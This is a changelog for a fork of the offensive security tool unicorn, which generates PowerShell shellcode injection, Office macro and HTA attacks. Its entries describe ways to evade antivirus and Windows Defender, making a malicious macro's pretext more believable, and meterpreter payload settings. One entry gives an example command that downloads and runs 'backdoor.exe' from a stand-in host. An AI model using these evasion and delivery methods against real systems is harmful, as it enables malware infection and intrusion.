CHANGELOG.txt - forked from trustedsec/unicorn
~~~~~~~~~~~~~~~~
version 2.3.5
~~~~~~~~~~~~~~~~
* added better evasion on -EncodedCommand
~~~~~~~~~~~~~~~~
version 2.3.4
~~~~~~~~~~~~~~~~
* added decoded base64 -EncodedCommand for better AV evasion
~~~~~~~~~~~~~~~~
version 2.3.3
~~~~~~~~~~~~~~~~
* most AVs were flagging on -enc rather than -EncodedCommand, and -EncodedCommand with a base64 argument would flag Windows Defender. This change looks to get around both, in the macro as well as in the standard ps1/encoded-command outputs.
~~~~~~~~~~~~~~~~
version 2.3.2
~~~~~~~~~~~~~~~~
* changed Auto_Open to AutoOpen() - thanks @JAshton
~~~~~~~~~~~~~~~~
version 2.3.1
~~~~~~~~~~~~~~~~
* fix indent issue
~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~
* added support for windows/download_exec as a payload option - run: python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe - note that the target does not need to be an exe; it downloads and executes whatever you point it at
* fixed an issue that caused macro injection to not work properly (duplicate PowerShell command)
~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~
* PEP 8 formatting
* Python 3 conversion
* added randomized variable names (not fully complete yet, but better than before) - AV was picking up on the fixed variable names and the base64-encoded strings
~~~~~~~~~~~~~~~~
version 2.1.2
~~~~~~~~~~~~~~~~
* set EnableStageEncoding to true by default
~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~
* added the --smallest flag to the msfvenom generation step, which compacts the shellcode to a smaller size
~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~
* added the ability to import your own PowerShell into attacks (thanks to curi0usJack's pull request)
* fixed a spacing issue when generating the macro attack
~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~
* added a brand new HTA attack vector for direct web application compromise (thanks Justin Elze)
* added a brand new binary-to-cert attack (thanks Matthew Graeber)
* added window.close(); after the script
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* slimmed down the PowerShell injection code even more
* when using windows/meterpreter/reverse_https, the options StagerURILength=5 StagerVerifySSLCert=false are passed to msfvenom to trim the payload. This is needed because of the character limit when pasting into a command window; with these two settings the generated code is slimmed down significantly and fits within the normal length
* added support for shikata_ga_nai to obfuscate the shellcode before UTF-16LE (as -EncodedCommand requires) and base64 encoding. This now throws off signatures when the output is contained inside a file
~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~
* fixed an issue where PowerShell injection might not work on 32-bit platforms
* shaved around 32 bytes off the command-line argument
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~
* fixed AutoOpen not working on some Office installations - now works on all Office documents including PowerPoint, Word and Excel
* changed the open description to fix a typo and make it more believable
* fixed spacing issues when generating the macro attack
* added instructions on how to add the macro to an Office document when using the macro attack
* added a better description and instructions for PowerShell injection
* added a better description of the initial loading of the payload
~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
* incorporated new macro attack from Rik van Duijn (RCX, @rikduijn)
* code cleanup and fixed an issue where argument values were not shown when not formatted properly
* redirected stderr to subprocess.PIPE
* slimmed the unicorn PowerShell injection code by about 17 bytes
~~~~~~~~~~~~~~~~
version 0.5
~~~~~~~~~~~~~~~~
* fixed the hidden window command when using PowerShell injection
~~~~~~~~~~~~~~~~
version 0.4
~~~~~~~~~~~~~~~~
* shortened the PowerShell injection code by removing unused code and shortening initial command names
* removed EnableStageEncoding - after extensive testing, it can produce unreliable results
* fixed a bug that caused unicorn to not work properly due to changes in msfvenom
* slimmed the encoded PowerShell command, removed an unused else statement
~~~~~~~~~~~~~~~~
version 0.3
~~~~~~~~~~~~~~~~
* updated the msfvenom call to include the format type and architecture, fixing a bug where it would not generate the appropriate shellcode
~~~~~~~~~~~~~~~~
version 0.2
~~~~~~~~~~~~~~~~
* changed the output name
* added appropriate licensing
* slimmed the PowerShell code and added -noprofile to the downgrade process
~~~~~~~~~~~~~~~~
version 0.1
~~~~~~~~~~~~~~~~
* initial release of magic unicorn